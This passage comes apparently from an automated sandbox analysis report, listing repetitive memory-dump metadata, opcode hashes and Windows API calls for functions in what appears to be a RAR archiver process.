                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3432b9c8060d01ce72343edc576a4dccd09043a68da9ff68992643fd273dc9a
                                                            • Instruction ID: 58499bc3d984ee7d0227a2e5cc4105cf2c10bbb284de6cf9a785e36c01d41aea
                                                            • Opcode Fuzzy Hash: c3432b9c8060d01ce72343edc576a4dccd09043a68da9ff68992643fd273dc9a
                                                            • Instruction Fuzzy Hash: 80E1E621A0CE8281FF20AA2494542FAE751EF41BA8F940535DD6D8B7D6FE2CA449CF30
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88ca505e5f63b4630595d2a5785bb34e5d1a854cc4efaa54bf81e7772238fa42
                                                            • Instruction ID: 6ef4a0fd241b06ff6af43b313335c0171d05775806a043d7fda7faeff622152c
                                                            • Opcode Fuzzy Hash: 88ca505e5f63b4630595d2a5785bb34e5d1a854cc4efaa54bf81e7772238fa42
                                                            • Instruction Fuzzy Hash: 4E514773528BD194E700AF24A8441ED77A8FB44F98F5C423ADA880B79AEF389155C731
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                            • Instruction ID: 298c4801b5fa0a3770d7d9f12883f0897256884471e754b12e28ad3b8a2f2cb2
                                                            • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                            • Instruction Fuzzy Hash: DB41D171E0DE13C2FB68BB10A491279E661AF90B60F80443DD90D0B691FE3CE84CCB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CommandLine
                                                            • String ID:
                                                            • API String ID: 3253501508-0
                                                            • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                            • Instruction ID: f85eaefe0d83da283df4f9fd6e97c5cc8dfa44e9a1a84edecda07dec543063bb
                                                            • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                            • Instruction Fuzzy Hash: 7101881161CD4285EA15B756A4001BFD760AF45BA4FC80435EE5D07359FE3EE84A8B20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID:
                                                            • API String ID: 1825529933-0
                                                            • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                            • Instruction ID: 60b99ba75bc06e66be20e4596541c240c1d2ab8007a082067f6540044e248bc6
                                                            • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                            • Instruction Fuzzy Hash: 0001677170CA9285EE107F16A40506AE651BB59FD0F984834EF8D4BB5AEE3DD0464B14
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
                                                            • Instruction ID: a20010d629400f028473c7956ae65a86067801d9ec96f0056ee73e661d6bc9dc
                                                            • Opcode Fuzzy Hash: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
                                                            • Instruction Fuzzy Hash: 44012C74A0CE43C0F968B6A69A4027AD3915F84BF4FD8C238ED5D462D6FD6CA40D4A30
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                            • Instruction ID: aa21dc81eecc23164f58e126a64fdcf1af3368bcd011913400f74876e6935c5d
                                                            • Opcode Fuzzy Hash: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                            • Instruction Fuzzy Hash: E2F0863290CAC146DA11AB7191152F8A7509B16BB5F484335DEBC0B2D7DE5CD08D8F30
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                            • Instruction ID: b212977cbe4fac0f8f82bef3a69da04df68ae1f7e6a686866be63d6536195b4b
                                                            • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                            • Instruction Fuzzy Hash: 44F05E31E0DA43C0FA947AA25850279D3944F447B0FC9463CED2E463C1FE5CE44C8934
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                            • Instruction ID: e18ccaf49ecca36cbb698190efa1662a95a16b937b69c70bb0528d81c40be418
                                                            • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                            • Instruction Fuzzy Hash: E8F0A433A0CE8685FB65AF64E4503B5A650DB00B78FA85334D63D054D9EF68D89ACB60
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                            • Instruction ID: 5ea481b4296c95d6a5b47cf02d9859f53966a4f8e10e406570b06e3156cef129
                                                            • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                            • Instruction Fuzzy Hash: D5E04F60F1DB0680ED5876A218610B983401F5EBA3ED45438CC3E26382FD1DE45D5E20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                            • Instruction ID: a5c2db7213306d8fef6b0ee04fb863264fa893708608ee5eba4d5fee99762a49
                                                            • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                            • Instruction Fuzzy Hash: D9D01776E1ED06C2F705AB40A845330E6716F583B9FC9073CC40D04550EFAC206C8A20
                                                            APIs
                                                            • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D4549
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                            • Instruction ID: d99d2a82c6a1829564e5a71374fc301fa8c4a71200823344da53e180484d4845
                                                            • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                            • Instruction Fuzzy Hash: B1C02B36E09C81C0D504732D88550749210BF44B35FD00330C13D051E0EF1840EF0B10
                                                            APIs
                                                              • Part of subcall function 00007FF71D2F49F4: LoadStringW.USER32 ref: 00007FF71D2F4A7B
                                                              • Part of subcall function 00007FF71D2F49F4: LoadStringW.USER32 ref: 00007FF71D2F4A94
                                                              • Part of subcall function 00007FF71D2FB6D0: Sleep.KERNEL32(?,?,?,?,00007FF71D2CCBED,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2FB730
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71D2D6CB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: LoadString$Sleepfflushswprintf
                                                            • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                            • API String ID: 668332963-4283793440
                                                            • Opcode ID: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                            • Instruction ID: 4d7f8a1fab6fe606155c94b5148df2606649452cf41f22f33cd71f48d78db8d7
                                                            • Opcode Fuzzy Hash: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                            • Instruction Fuzzy Hash: 1C226222A0CEC695EB30FB24D8501FAE761EB55364FC44036D69D0769AFE6CE54DCB20
                                                            APIs
                                                            • CreateFileW.KERNEL32 ref: 00007FF71D2CD4A6
                                                            • CloseHandle.KERNEL32 ref: 00007FF71D2CD4B9
                                                              • Part of subcall function 00007FF71D2CEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF71D2CEE47), ref: 00007FF71D2CEF73
                                                              • Part of subcall function 00007FF71D2CEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF71D2CEE47), ref: 00007FF71D2CEF84
                                                              • Part of subcall function 00007FF71D2CEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF71D2CEFA7
                                                              • Part of subcall function 00007FF71D2CEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF71D2CEFCA
                                                              • Part of subcall function 00007FF71D2CEF50: GetLastError.KERNEL32 ref: 00007FF71D2CEFD4
                                                              • Part of subcall function 00007FF71D2CEF50: CloseHandle.KERNEL32 ref: 00007FF71D2CEFE7
                                                            • CreateDirectoryW.KERNEL32 ref: 00007FF71D2CD4C6
                                                            • CreateFileW.KERNEL32 ref: 00007FF71D2CD64A
                                                            • DeviceIoControl.KERNEL32 ref: 00007FF71D2CD68B
                                                            • CloseHandle.KERNEL32 ref: 00007FF71D2CD69A
                                                            • GetLastError.KERNEL32 ref: 00007FF71D2CD6AD
                                                            • RemoveDirectoryW.KERNEL32 ref: 00007FF71D2CD6FA
                                                            • DeleteFileW.KERNEL32 ref: 00007FF71D2CD705
                                                              • Part of subcall function 00007FF71D2D2310: FlushFileBuffers.KERNEL32 ref: 00007FF71D2D233E
                                                              • Part of subcall function 00007FF71D2D2310: SetFileTime.KERNEL32 ref: 00007FF71D2D23DB
                                                              • Part of subcall function 00007FF71D2D1930: FindCloseChangeNotification.KERNELBASE ref: 00007FF71D2D1958
                                                              • Part of subcall function 00007FF71D2D39E0: SetFileAttributesW.KERNEL32(?,00007FF71D2D34EE,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2D3A0F
                                                              • Part of subcall function 00007FF71D2D39E0: SetFileAttributesW.KERNEL32(?,00007FF71D2D34EE,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2D3A3C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
